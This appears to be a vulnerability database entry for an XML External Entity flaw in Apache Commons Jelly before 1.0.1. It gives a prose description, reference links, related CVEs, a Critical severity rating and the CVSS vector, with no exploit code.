Description

During Jelly (xml) file parsing with Apache Xerces, if a custom doctype entity is declared with a "SYSTEM" entity with a URL and that entity is used in the body of the Jelly file, during parser instantiation the parser will attempt to connect to said URL. This could lead to XML External Entity (XXE) attacks in Apache Commons Jelly before 1.0.1.

Remediation

References

https://issues.apache.org/jira/browse/JELLY-293

http://www.securitytracker.com/id/1039444

http://www.securityfocus.com/bid/101052

https://lists.apache.org/thread.html/f1fc3f2c45264af44ce782d54b5908ac95f02bf7ad88bb57bfb04b73%40%3Cdev.commons.apache.org%3E

Related Vulnerabilities

CVE-2021-33036 Vulnerability in maven package org.apache.hadoop:hadoop-yarn-server-common

CVE-2020-2212 Vulnerability in maven package org.jenkins-ci.plugins:github-coverage-reporter

CVE-2019-1003022 Vulnerability in maven package org.jvnet.hudson.plugins:monitoring

CVE-2023-29016 Vulnerability in maven package io.goobi.viewer:viewer-core

CVE-2022-41230 Vulnerability in maven package org.jenkins-ci.plugins:build-publisher

Severity

Critical

Classification

CWE-611 CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Tags

Issue Tracking Vendor Advisory Patch Third Party Advisory VDB Entry